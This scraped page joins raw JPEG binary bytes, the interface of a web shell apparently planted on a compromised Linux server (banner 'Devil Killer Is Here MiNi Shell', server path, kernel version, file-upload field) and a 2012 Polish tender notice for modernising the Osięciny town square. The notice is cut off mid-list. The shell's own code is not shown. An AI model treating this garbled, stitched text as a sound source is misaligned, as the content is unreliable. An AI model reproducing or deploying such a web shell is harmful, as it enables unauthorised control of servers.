JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/120828-N-2012.html

<p class="kh_header"><b>Osięciny: Modernizacja Rynku w Osięcinach</b><br>
<b>Numer ogłoszenia: 120828 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osięciny , ul. I Armii Wojska Polskiego 14, 88-220 Osięciny, woj. kujawsko-pomorskie, tel. 054 2650030, 2650034, faks 054 2650185.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.ug-osieciny.samorzady.pl//; www.osieciny.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Rynku w Osięcinach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania pod nazwą: 
Modernizacja Rynku w Osięcinach

Przedmiotem inwestycji jest Modernizacja Rynku w miejscowości Osięciny, obejmująca teren oznaczony jako działki nr 164/1, 164/2, 155/7 i 506 stanowiący Plac Boh. Powstania Warsz. wraz z ciągiem pieszym do ul I Armii WP. 
Projektowane i istniejące zagospodarowanie działki.
Działki oznaczone jako teren przeznaczony do modernizacji są własnością Gminy Osięciny z siedzibą ul. I Armii WP 14, 88-200 Osięciny. Tereny działek nr 164/1 i 164/2 są przeznaczone jako tereny zielone, służące wypoczynkowi.
Na działce nr 164/1 znajduje się kiosk oraz dworzec PKS. Działka nr 164/2 jest niezabudowana. Działki nr 506 i 155/7 - to tereny komunikacji drogowej z ciągiem pieszym oraz ścieżką rowerową. 
Inwestor planuje modernizację Rynku w miejscowości Osięciny złożoną z zadań:

I. Modernizacja terenów działek nr 164/1 i 164/2 polegająca na:
przebudowie nawierzchni ciągów pieszych, chodników i placów,
budowie obiektów małej architektury, banerów i reklam służących promocji miejscowości takich jak: fontanna parkowa, herb Gminy Osięciny ułożony z ceramiki mrozoodpornej, maszty z flagami, murek z kamienia polnego z kratą ozdobną,
budowie oświetlenia projektowanej fontanny oraz masztów flagowych, 
całkowitej wymianie zieleni publicznej polegającej na wycince istniejących drzew  i krzewów  i założeniu nowej szaty roślinnej, 
II. Modernizacja terenów działek nr 155/7 i 506 polegająca na:
przebudowie nawierzchni istniejącego ciągu pieszego wraz z ścieżką rowerową,
budowie oświetlenia ciągu pieszego,
wprowadzenia placyków zieleni oddzielających ciąg pieszy od ścieżki rowerowej,
wycince istniejących drzew,
Projektowana obsługa w zakresie infrastruktury i komunikacji
projektowane przyłącze wodociągowe i kanalizacyjne dla zasilenia fontany  i odprowadzenia wody technologicznej, 
projektowane przyłącze energetyczne do zasilania fontanny,
projektowana linia oświetleniowa kablowa, 
projektowane modernizacja ciągów pieszych, chodników i placów,
Obszar inwestycji nie przekracza działek inwestora tj. Gminy Osięciny.

Główny zakres operacji dotyczy:
A. Budowy nowych nawierzchni ciągów pieszych i rowerowych deptak łączący Plac Bohaterów Powstania Warszawy z dworcem PKS i ul. I Armii Wojska Polskiego gdzie mieści się siedziba Urzędu Gminy w Osięcinach,
 Projektowane zagospodarowanie działek
Projektuje się nowe nawierzchnie ciągów pieszych, chodników i placów z kostki brukowej betonowej. Wszystkie ciągi piesze będą wydzielone obrzeżem betonowym. 
Odwodnienie ciągów pieszych i ścieżki rowerowej będzie powierzchniowe poprzez nadanie im odpowiednich spadów poprzecznych.
Szerokość projektowanej ścieżki rowerowej - 2,5 m.
Opis projektowanych rozwiązań.
a) roboty ziemne
Najpierw wytyczyć projektowane zagospodarowanie działek przez uprawnionego geodetę. Następnie przystąpić do korytowania. Nanieść projektowane rzędne terenu, a następnie wyprofilować i zagęścić podłoże pod warstwy konstrukcyjne.
b) projektowane chodniki i place na rynku w Osięcinach, dz. Nr 164/1 i 164/2, Plac  Bohaterów Powstania Warszawy,
kostka brukowa betonowa gr. 8 cm kamień polny
podsypka cementowo - piaskowa gr. 3 cm,
warstwa odsączająca z piasku gr. 10 cm,
Łączna grubość konstrukcji nawierzchni wynosi 21 cm
Projektowane chodniki i place posiadać będą na całej długości przekrój jednostronny o 1 procent pochyleniu.
c) projektowany ciąg pieszy wraz ze ścieżką rowerową, dz. Nr 155/7 i 506, ul. Ks. Matuszewskiego
kostka brukowa betonowa gr. 8 cm,
podsypka cementowo - piaskowa gr. 3 cm,
podbudowa z kruszywa łamanego gr. 15 cm,
warstwa odsączająca z piasku gr. 10 cm, grunt rodzimy zagęszczony
Łączna grubość konstrukcji nawierzchni wynosi 36 cm
Projektowany ciąg pieszy wraz ze ścieżką rowerową posiadać będą na
całej długości przekrój jednostronny o 1 procent pochyleniu.
d) odwodnienie
Projektuje się odwodnienie ciągów komunikacyjnych powierzchniowe,spływ wód zapewniają założone spadki poprzeczne oraz podłużne.
Działka nr 164-3 jak i 155-7 posiadają istniejącą kanalizację deszczową umożliwiającą odprowadzenie wód opadowych.
e) obramowanie
Projektuje się obramowanie ciągów pieszych, chodników i placów  obrzeżem betonowym 8 x 30 x 100 na podsypce piaskowej gr. 10 cm.
Istniejące obramowanie Placu Bohaterów Powstania Warszawy,  krawężnikiem betonowym 15 x 30 x 100 pozostaje bez zmian.

B. Zakupu towarów służących przedsięwzięciom związanym z kultywowaniem tradycji społeczności lokalnych lub tradycyjnych zawodów - poprzez wprowadzenie do projektu elementów wytwórczych ginących zawodów, z których słynie wieś Osięciny głównie
kowali i kamieniarzy, wprowadzenie elementów rękodzieła kowalskiego - kraty kute, zdobne o łącznej długości 58mb oraz elementów małej architektury w postaci klasycznego murku wykonanego z kamienia polnego o łącznej długości 210 mb.

C. Kształtowania obszarów o szczególnym znaczeniu dla zaspokojenia potrzeb mieszkańców, sprzyjających nawiązywaniu kontaktów społecznych, ze względu na ich położenie oraz cechy funkcjonalno - przestrzenne, poprzez odnawianie lub budowę nowych ciągów pieszych, budowę placu centralnego, służącego integracji społecznej, o łącznej powierzchni 2920m2, budowę oświetlenia centralnych miejsc wsi ( w tym 11 lamp ulicznych i sześć oświetleń nawierzchniowych wodoodpornych), co wpłynie na zwiększenie poczucia bezpieczeństwa i dostępności miejsc publicznych po zmroku oraz podkreśli ważność miejsca sześcioma masztami z flagami unijnymi, Polski i gminy Osięciny oraz herbem gminy ułożonym na wejściu do wnętrza parkowego dodatkowo ustawieniu ławek i koszy na odpady,

D. Urządzania i porządkowania terenów zielonych i miejsc wypoczynku - Rynku w Osięcinach, Placu przy dworcu PKS i deptaku z miejscami wypoczynkowymi, których do tej pory nie było, poprzez całkowite usunięcie drzewostanu o najniższych wartościach biologicznych zniekształconego w wyniku maksymalnych cięc korony, o czym świadczy proporcja obwodu pnia do wielkości korony, pochylonego, zestarzałego, który stanowi zagrożenie dla przechodniów, parkujących samochodów i jest źródłem licznych czynników chorobotwórczych dla pozostałego drzewostanu, wprowadzenie nasadzeń nowych drzew   i krzewów dobranych zgodnie z wymogami siedliskowymi i krajobrazowymi o dużych walorach dekoracyjnych łącznie 51 szt. Ważnym elementem działań odnowy jest budowa fontanny ogrodowej o zewnętrznym wymiarze średnicy 4,9m w miejsce starej wykorzystywanej obecnie jako gazon dla róż. stara konstrukcja betonowa do demontażu,

E. Rewitalizacji centrum wsi, które stanowi otoczenie dla zabytkowego kościoła parafialnego, poprzez odtworzenie osi centralnej od kościoła wzdłuż ulicy Bohaterów Powstania Warszawy, jako całości połączonej funkcjonalnie, ekspozycyjnie, z zachowaniem ciągłości architektonicznej detalu kamień polny w ogrodzeniu kościelnym   i projektowany murek  z kamienia polnego wydzielający wnętrze parkowe Rynku,

F. Wyposażenia wnętrz architektonicznych w elementy służące promocji lokalnych usług, w tym budowie baneru reklamowego na głównym wjeździe do wsi Osięciny,

G. Zakupu materiału siewnego w tym nasion traw na odnowione trawniki, sadzonek drzew i krzewów w celu zrównoważenia ubytków w drzewostanie po niezbędnej wycince oraz roślin wieloletnich bylin i róż,   o najwyższych walorach dekoracyjnych.
Realizacja tych celów jest ściśle związana z oczekiwaniami mieszkańców wsi Osięciny, wpłynie na korzystny rozwój integracji i nowych korzystnych relacji społecznych, poprzez stworzenie miejsca o wymiarze publicznym, łatwo dostępnego, położonego w centrum wsi, nawiązującego do tradycji i kultury jego mieszkańców i pozostającego w harmonii  z zabytkowym obiektem, jakim jest kościół parafialny.

Szczegółowy opis przedmiotu zamówienia zawiera:      
a)dokumentacja projektowa                                                                                                                             
b) przedmiar robót			
c) specyfikacja techniczna wykonania i odbioru robót

	
Przedstawione ww dokumentacji projektowej, siwz, przedmiarze robót oraz specyfikacji technicznej wykonania   i odbioru robót wskazania na urządzenia techniczne i materiały z podaniem producenta, należy traktować jako przykładowe. Oznacza to, że wykonawcy mogą zaproponować inne rozwiązania, z zachowaniem odpowiednich, równoważnych, tj. nie gorszych niż wskazane w dokumentacji projektowej, siwz i specyfikacji technicznej wykonania i odbioru robót, parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem projektu. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany  w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt.
 Okres gwarancji wymagany przez Zamawiającego - 36 miesięcy.                                             
 Zaleca się wizytację przyszłego placu budowy.                                                                                     
 Zamówienie poniżej 5.000.000 euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.20-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. W niniejszym postępowaniu Zamawiający wymaga  wniesienia wadium w wysokości  24.000,00 zł  
  słownie: Dwadzieścia cztery tysiące zero groszy
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000 r.   o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm)
3.    Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy  Urzędu Gminy Osięciny  KDBS Oddział Osięciny 72 9550 0003 2002 0000 0101 0002  z dopiskiem na blankiecie przelewu wadium na zabezpieczenie oferty przetargowej -Modernizacja Rynku w Osięcinach
 Kopię dowodu przelewu   potwierdzoną  za zgodność z oryginałem należy dołączyć do oferty.
4.Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeniu pieniężnym SKOK lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6b ust. 5 pkt  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przed­siębiorczości, należy w formie  nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a kopię potwierdzoną za zgodność                        z oryginałem załączyć do oferty.
          Wadium należy wnieść przed upływem terminu składania ofert. tj. do dnia 8 maja 2012 r.  do godz.  9: 45.
6. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie   zaliczone na rachunku bankowym Zamawiającego.
7. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowaną formą wadium zostanie wykluczony     z postępowania, a jego oferta zostanie odrzucona.
8. Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze oferty najkorzystniejszej                            lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,                        z zastrzeżeniem  art. 46 ust. 4a ustawy.
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci niezwłocznie wadium                  po zawarciu umowy w sprawie zamówienia publicznego.
10. Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podst. art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez  Zamawiającego.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:                                                                                                                              
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
b)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej  za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
14. Zamawiający zatrzyma wadium wraz z odsetkami,  jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej  działalności lub czynności, jeżeli Wykonawca oświadczy, że spełnia warunki udziału w postępowaniu określone w pkt. 4 ppkt 4.1 siwz  i art. 22 ust.1 ustawy Pzp.
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia     wymienionego     w pkt. 5 ppkt 5.1. siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia zapewniającego wykonanie zamówienia, jeżeli Wykonawca wykaże wykonanie zgodnie  z zasadmi sztuki budowlanej i prawidłowo ukończone w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie:
      - co najmniej dwóch zadań polegających na budowie, przebudowie lub remoncie placu, ulicy lub chodnika o nawierzchni z kostki betonowej na łączną kwotę nie mniejszą niż 600.000,00  zł brutto lub jednego zadania na kwotę nie mniejszą niż 300.000,00 zł brutto oraz
         -  co najmniej dwóch zadań z zakresu małej architektury na łączną kwotę nie mniejszą niż 150.000,00  zł brutto lub jednego zadania na kwotę nie mniejszą niż 100.000,00 zł brutto.
          Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w pkt. 5 ppkt 5.3. lit. a) i b)  siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym, jeżeli   Wykonawca oświadczy, że spełnia warunki udziału  w postępowaniu określone w pkt 4 ppkt 4.1 siwz i art.22 ust.1 ustawy Pzp.
          Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego  w pkt. 5 ppkt 5.1. siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca oświadczy, że dysponuje: 
- przynajmniej jedną osobą posiadającą uprawnienia bez ograniczeń  do kierowania robotami budowlanymi w specjalności:
-drogowej
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
Warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jedną osobę posiadającą  wszystkie wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami.
          Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów                             i oświadczeń  wymienionych w pkt. 5 ppkt 5.4. lit. a i b  siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli Wykonawca oświadczy, że spełnia warunki udziału w postępowaniu określone w pkt 4 ppkt 4.1 siwz i art. 22 ust.1 ustawy Pzp.
           Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego w pkt. 5 ppkt 5.1 siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
